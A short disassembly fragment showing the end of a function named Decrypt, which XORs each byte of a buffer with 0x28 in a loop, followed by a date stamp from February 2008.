00401984 loc_401984: ; CODE XREF: Decrypt+17 j
00401984 mov eax, [ebp+arg_0]
00401987 add eax, ecx
00401989 xor byte ptr [eax], 28h
0040198C inc ecx
0040198D cmp ecx, [ebp+arg_4]
00401990 jl short loc_401984
00401992 loc_401992: ; CODE XREF: Decrypt+9 j
00401992 pop ebp
00401993 retn
00401993 Decrypt endp
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2008年02月26日 17:15:03